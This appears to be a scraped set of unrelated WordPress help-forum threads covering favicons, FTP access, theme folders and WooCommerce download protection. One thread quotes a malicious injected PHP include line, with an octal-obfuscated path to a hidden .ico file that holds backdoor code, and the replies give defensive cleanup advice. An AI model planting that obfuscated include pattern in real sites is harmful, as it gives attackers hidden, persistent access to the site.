I was given administrative access to a blog and have been asked to update the favicon. I watched a video and I have done all the steps needed to generate a favicon from an image. The only problem that I have is using FTP to transfer the image to my root directory. I understand where the root directory is theoretically found but the problem is that I didn't install Wordpress. All I was given was administrative access. I'm assuming that the person who created the site has the files on his computer, so only he can update the root directory and place the favicon in it. However, common sense tells me that this assumption has to be wrong or is it?
Should I be asking the site's creator to copy the files to me? This doesn't seem right at all. Thanks for any help.
If you have an admin access to a live blog then the wordpress files are correctly installed. Check for folders starting by the prefix wp- like for instance wp-content in your FTP directories. If you can't find any then you are not on the correct FTP server. Now suppose you are on the right FTP server. Put your .ico image in the /wp-content/uploads folder.
Once done to display the favicon go to your admin panel in the menu on the left choose the option Appearance or Display (I don't know the exact word since I am using it in French but it should be something related to the look of your blog) Then go to the editor option and select the file header.php to edit.
And add the following line of code right after the code <head>:
<link rel="shortcut icon" href="/wp-content/uploads/favicon-filename.ico">
Save the changes and voilĂ .
Related
It looks like my wordpress site has been hacked. Following code snipt was in index.php, wp-config.php
<?php
/*6b9bb*/
#include "\057ho\155e/\151nt\145r7\0602/\160ub\154ic\137ht\155l/\167p-\151nc\154ud\145s/\152s/\164in\171mc\145/.\146b4\063d6\0700.\151co";
/*6b9bb*/
I have changed:
WP Admin URL and put strong password username
changed cpanel/FTP password with strong one
Implemented iTheme Security
Updated Wordpress to latest (themes and plugins)
However, the code again repeated. What can be good solutions?
p.s. I am using siteground.
Thanks
Yeah someone is including a .ico file (open it with a Text Editor, and you will see it is some php Code and no real ico file)
/home/inter702/public_html/wp-includes/js/tinymce/.fb43d680.ico
Somehow despite your changes of host and passwords you hacker is able to get in, once they are in they can setup all sorts of backdoors to keep access, any .php file of theirs can do this.
At the moment closing the initial front-door they use is your sole occupation.
Follow the advice in this article:
https://codex.wordpress.org/FAQ_My_site_was_hacked
And then: https://codex.wordpress.org/Hardening_WordPress
Here are some links about backdoors:
http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/
http://smackdown.blogsblogsblogs.com/2012/11/14/hacked-on-hostpapa-or-netregistry/
http://ottopress.com/2009/hacked-wordpress-backdoors/
Source: https://wordpress.org/support/topic/wordpress-hacked-strange-files-appears/
Once the site is hacked, in my opinion, resistance is futile. No scan or tool will help you. you'll have to replace all files with fresh downloads. mostly it's straight forward:
Backup the whole installation (just in case)
Download the complete wp-content/uploads folder
Make a Screenshot or save the page with the currently active plugins
Delete ALL files
Get a fresh wordpress setup and extract it
Download a fresh copy of your theme and child-theme (recreate the previous setup)
Copy the previous wp-config.php to this fresh install. but take a GOOD look at it. usually it also has some virus/backdoors in it. usually easy to see and remove. now you're already connected with your DB
Examine the saved uploads folder for files that shouldnt be there, like php files. then upload it to the new folder
Reinstall all plugins, fresh downloads
I faced this problem too, and step by step I did the steps below:
Cleaning the injected code, manually
Changing all the passwords
Hiding the WP admin dashboard URL
Limiting the login attempts
Installing security plugins (Sucuri, Wordfence security)
Contracting with Sucuri plan
The good thing is to install Wordfence security plugin, run the scan, then you will detect all the files with the injected code and you can clean the injected code manually.
you can also visit this link too
https://naderzad.info/web-development/wordpress-code-injection/
As the title states I have a question about digital downloadable products through woocommerce. I am new to web development and wordpress so go easy on me. I am trying to add a downloadable product where you can't access the file by direct url. I have set the download type to force download to prevent link sharing but found that I can still access the purchasable files by typing in the direct path Example:
example.com/wp-content/uploads/woocommerce_uploads/2015/06/examplefile.pdf
I have done quite a bit of research but have come up with very few results. One of the only things that I have found is that I should move the downloadable files outside of the root directory. I have attempted to do this but then the download links no longer work. Instead of doing a forced download like normal it redirects to to a page like
example.com/home/user/public_html/home/user/downloads/examplefile.pdf
So I am thinking woocommerce must not be friendly with the files outside the root directory. All in all I am out of ideas of what else to try. Any help or suggestions of how to make this work (having files outside root directory) or other solutions would be greatly appreciated.
If you create a folder outside the public_html directory and upload the files here, you will be safe.
You can find detailed explanations about this topic and how to copy the links of uploaded files in this blog post.
You can add a .htaccess file in the woocommerce_uploads folder with
deny from all
A relative has a wordpress based site that they want me to make a few changes to that I can't seem to find a way of doing from wordpress itself because it puts everything in categories but if something doesn't install itself fully or anything you can't find all the files. I want to have some kind of file manager so i can browse the website's filesystem directly, find the files and add the exact code I want to add, and be done with it without removing or disabling wordpress itself.
Use and ftp client to login. This will allow you to browse the file and folder structure of the server. Once you get logged in you can use......
dir - directory listing
cd - change directories
put add files to the server
get - pull copies of files from the server
There's more, but this should get you started.
I have the FTP access for my Wordpress site, but i can't find the root folder of my site,but in the admin section, file path of an image in media has http://site1.com/wp-content/uploads/2014/03/loading-624x832.jpg, I have searched all the folders but not this image is not in any of the files.Any idea or solution to find the path? Thanks for your response in advance.
Depending on the hosting company you use for your website, it could be in many locations e.g. httpdocs, httpdocs, siteapps, public_html, or www, or maybe even something else.
You should contact your hosting company to find out where wordpress is installed from the control panel.
If you have access to your site than put this echo get_template_directory(); in your theme's functions.php file.
After adding that line, Navigate to your site and there top of your site you can see full directory path of your theme.
Now you can locate you WordPress site directory by replacing wp-content/themes/YOUR_THEME_NAME.
when you know directory path, remove this line so other can not see for security.
This might help you little bit.
I'm having a very basic problem: I'm trying to create a new theme for a wordpress installation locally on my computer.
I've created a styles.css and index.php file and put it in a folder in wp-content/themes. But it doesn't appear in the Wordpress themes page.
As a test, I made a change to the description of one of the existing themes (Twenty-Ten) in its style.css, and refresh the Wordpress themes page, but the old description continues to be shown. This suggests to me that I'm simply using the wrong folder, but that's not possible! Any ideas on this problem much appreciated.
UPDATE: In fact, even when I delete Twenty Ten from the Themes folder, it's still available as an option in the Wordpress backend, and I can activate it... Very strange...
G
I agree with your diagnosis. You are either looking at the wrong folder or in fact the wrong computer. There's no other way that you could change the theme to one that has been deleted.
I suggest that you confirm you are in the same universe you think you are in. Create a simple file localserver.txt in your WordPress directory and then confirm that you can access that file.
If you can't, you have your answer. You are somehow accessing a different location.
If you can access that text file, you need to go further and look to see if something like the site url setting is redirecting you to the live site, without you realizing it, when you access wp-admin.
Beyond that, I'd need to know more about your setup. Something like having www.example.com in your /etc/host file and not example.com can cause similar confusion...
Are you using Wordpress Multisite?
In that case you have to 'enable' that theme in the Network admin manager